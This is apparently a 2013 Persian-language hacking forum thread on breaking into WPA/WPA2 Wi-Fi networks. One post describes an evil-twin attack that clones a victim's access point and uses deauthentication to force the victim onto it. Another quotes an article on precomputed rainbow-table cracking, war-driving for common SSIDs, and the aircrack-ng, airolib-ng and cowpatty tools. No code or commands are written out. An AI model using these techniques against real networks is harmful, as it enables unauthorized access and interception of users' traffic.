خب پیش خودم گفتم پس اگر ما بیایم و یک AP دقیقا با همون مشخصاتی که قربانی در داخل access point واقعی وجود داره ایجاد کنیم (از نظرنام و نوع اینکریپشن و پسورد) پس میتونیم قربانی رو بدون اینکه روی کانکشنی چیزی کلیک کنه روی اکسس پوینت خودمون بندازیم ، فقط کافیه با استفاده از deauthenticaion قربانی رو از شبکه بندازی بیرون اون وقت چه اتفاقی* میفته؟ سیستم قربانی می*خواد دوباره به AP با essid مورد نظر وصل شه و چون ما یک AP دقیقا با همون مشخصات ساختیم به صورت اتومات به ما وصل می*شه اگر هم بخواد به AP اصلی* وصل بشه نمیتونه چون ما داریم بسته هایی به اون می*فرستیم که باعث می*شه دوباره DC بشه
MR.AN0NYM 03-19-2013, 06:35 PM خوب مونده فقط درمورد wps بحث بشه که از قلم افتاده...:12:
E2MA3N 03-23-2013, 01:58 PM اما همون طور که در بالا گفتم این روش ها فقط برای یک essid می باشد یعنی این گونه نیست که شما 1 بار وقت بزارید و یک پسورد لیست هش شده تهیه کنید و به صورت مداوم از اون استفاده کنید

داشتم مقاله ای رو می خوندم که همین ترفند رو حسابی توضیح داده بود و به قول اینجا به چالش کشیده بود گفتم این چند خط که مرتبط هم هست رو بزارم و در آخر خود مقاله رو که دوستان استفاده کنند

‫حملات ‪ pre‐computed‬عليه 2/‪ : Wpa‬بدليل كندي پروسه شكستن رمز 2/‪ wpa‬برخي به فكر استفاده از روش هاي حمله مبتني بر‬
‫‪ pre‐computer tables‬افتاده و ابزارهايي را بدين منظور توليد كردند. استفاده از تكنيك پياده سازي ‪ 64rainbow table‬براي‬
‫الگوريتم هاي مختلف سالهاست كه رواج داشته و در برخي موارد مانند ‪ ntlm‬و يا 5‪ md‬علي رغم ارتقاع سرعت و قدرت پردازنده ها هنوز‬
‫هم كارآمد و داراي سرعت قابل قبولي در بازيابي كلمات عبور از مقدار ‪ hash‬آنها مي باشد. اصولآ هرچه روند توليد ‪ hash‬كند تر و از نظر‬
‫محاسباتي سنگين تر باشد، استفاده از ‪ rainbow table‬ها براي شكستن آنها مقرون به صرفه تر خواهد بود. اين در مورد ‪ wpa‬نيز صدق‬
‫مي كند. سرعت در روش ‪ dictionary attack‬قابل مقايسه با روش ‪ rainbow (pre‐computed) table‬نبوده و بسيار كند تر است‬
‫بطوري كه سرعت حمله بدين روش بر روي يك سيستم با پردازنده معمولي با سرعت حمله در يك سيستم مجهز به سريع ترين ‪ gpu‬هاي‬
‫موجود نزديك است.‬
‫اساس كار ‪ rainbow table‬ها بسيار ساده است. بجاي اينكه به ازاي هر ‪ hash‬يكبار كليه كلمات عبور ممكن توليد و تست شوند، ليستي‬
‫از كلمات عبور رايج تهيه شده و ‪ hash‬مربوط به هر مورد محاسبه شده، در يك ‪ table‬ذخيره مي گردد. حال در صورت نياز به بدست آوردن‬
‫مقدار ‪ clear‐text‬يك ‪ hash‬كافيست ‪ table‬مذكور براي وجود ‪ hash‬مورد نظر جستجو شده و مقدار ‪ clear‐text‬آن استخراج گردد. از‬
‫نظر سرعت و بار پردازشي جستجو در حافظه بسيار سريعتر از تكرار پروسه توليد ‪ hash‬و مقايسه نتيجه است. براي توليد يك ‪ table‬اگرچه‬
‫زمان زياد و فضاي ذخيره سازي قابل توجهي مورد نياز است اما اين عمل تنها يكبار انجام مي شود و پس از آن تنها كار، جستجوي ‪table‬‬
‫هاي توليد شده براي مقدار ‪ hash‬خواهد بود. در بسياري از سيستم ها البته راهكاري براي مقابله با اين تكنيك حمله وجود دارد. استفاده از‬
‫‪ salt‬در توليد ‪ hash‬براحتي اين تكنيك حمله را بر بسياري از موارد نا كارآمد خواهد كرد. ‪ salt‬يك مقدار تصادفي است كه قبل از توليد‬
‫‪ hash‬و در مواردي بعد از آن در كنار كلمه عبور اصلي ) يا مقدار ‪ hash‬شده آن( قرار مي گيرد و باعث مي شود تا كلمه هاي عبور يكسان،‬
‫مقدار ‪ hash‬متفاوتي داشته باشند. بدين ترتيب براي توليد ‪ rainbow table‬براي كلمات عبور، به ازاي هر مقدار ‪ salt‬بكار رفته مي‬
‫بايست يكسري ‪ table‬جديد توليد گردد و اين يعني حجمي نجومي از فضاي ديسك مورد نياز و سالها پردازش براي توليد.‬
‫از اين تكنيك امن سازي در توليد ‪) eapol hmac hash‬يا همان ‪ hash‬نهايي مد نظر ما براي حمله( در ‪ wpa‬نيز استفاده شده است.‬
‫در پروسه توليد ‪ eapol hmac‬كه پيش از اين در مقاله بنام ‪ pmk‬معرفي شد، از ‪ ssid‬بعنوان مقدار ‪ salt‬استفاده مي شود. استفاده از‬
‫‪ ssid‬بعنوان ‪ salt‬بدين معني است كه براي استفاده از روش حمله مبتني بر ‪ ،rainbow table‬به ازاي هر ‪ ssid‬مي بايست يك سري‬
‫‪ table‬توليد شود. اين مورد اگرچه كاربرد اين تكنيك حمله را محدود كرده است اما شايد دانستن اين نكته كه بسياري از كاربران از ‪ssid‬‬
‫هاي رايج و مشابه در تنظيمات شبكه خود استفاده مي كنند، كمي اميدوار كننده باشد. در صورتي كه شما قصد توليد اين‪ table‬ها را داريد‬
‫مي توانيد از ليست هاي ‪ ssid‬هاي رايج56 براي توليد استفاده كنيد. در صورتي كه قصد توليد يك ‪ table‬كارامد را داريد، علاوه بر استفاده از‬
‫ليست هاي موجود از ‪ ssid‬هاي رايج، مي توانيد خود نيز پس از انجام ‪ war‐driving‬ليستي از محبوب ترين نام هاي استفاده شده در‬
‫محدوده خود را به موارد موجود اضافه كنيد. ‬
‫نرم افزارهاي مختلفي اين روش حمله را در كنار امكانات خود ارائه كرده اند. ‪ cowpatty‬و ‪ aircrack‐ng‬هر دو بخوبي اين تكنيك را پياده‬
‫سازي كرده اند. مزيت پياده سازي نرم افزار ‪ aircrack‐ng‬پشتيباني از فرمت ‪ table‬هاي استاندارد و همچنين فرمت اختصاصي نرم افزار‬
‫‪ cowpatty‬مي باشد و اطلاعات در بانك اطلاعاتي استاندارد ‪ sqlite‬ذخيره سازي مي گردد. همچنين بروز رساني و كامل كردن ‪table‬‬
‫ها در بسته نرم افزار ‪ aircrack‐ng‬بسيار آسان تر از ‪ cowpatty‬است. در بسته نرم افزاري ‪ ،aircrack‬ابزار ‪ airolib‐ng‬بمنظور ايجاد‬
‫‪ table‬ها مورد استفاده قرار مي گيرد، و پس از ساخته شدن اين ‪ table‬ها توسط خود نرم افزار ‪ aircrack‐ng‬مورد استفاده قرار مي گيرد.‬



اصل مقاله رو هم پیوست کردم . با تشکر :14:
MR.AN0NYM 03-24-2013, 11:54 AM با سلام و تبریک سال نو
وقتی می بینم یه چالشی کم رنگ میشه انگاری مخم سوت میکشه
خیلی دوست داشتم دوستان روی wps بحث کنن و از تجارب اهالی فن برخوردار بشیم که همه یه جورایی مشغولن وخودم از همه بدتر که حتی نمی تونم مقاله رو تجزیه و تحلیل کنم براتون و لی مطمئنم خیلی به دردتون می خوره
http://article.truenet.ir/fa/?p=30
0x0ptim0us 04-09-2013, 02:21 AM کاربر roof اینجا جای پرسیدن سوال نیست ! اینجا تاپیک مربوط به برسی تکنیک ها هست!
شما سوالتون رو تو بخش "پرسشو پاسخ" مطرح کنید نه اینجا.
با این کارتون فرم تاپیک به هم میریزه و از موضوع اصلی خارج میشه.


مطالب مشابه :


تنظیمات مودم Dlink 2730 u

راهنمای تنظیمات adsl فای مودم d link سپس نام کاربر رمز عبور برای به اشتراک گذاشتن اتصال به




تنظیم کانکشن اینترنت مودم وایرلس

پسورد گذاری روی مودم وایرلس ولی بطور کلی در مودم asus و dlink انجام مودم وایرلس




تغییر دادن رمز مودم روتر D-Link

تغییر دادن رمز مودم روتر D-Link باید بر روی شبکه بی سیم رمز مستحکم با وایرلس (به عبارتی




نقد و بررسی مودم-روتر D-Link 2740U

نقد و بررسی مودم-روتر D-Link که شما با گذاشتن رمز و یا فعال کردن ای بر روی




هک کردن

اما فرض کنید شما داخل یک شبکه هستید که هم وایرلس E2MA3N گذاشتن رمز 2/‪ wpa




برچسب :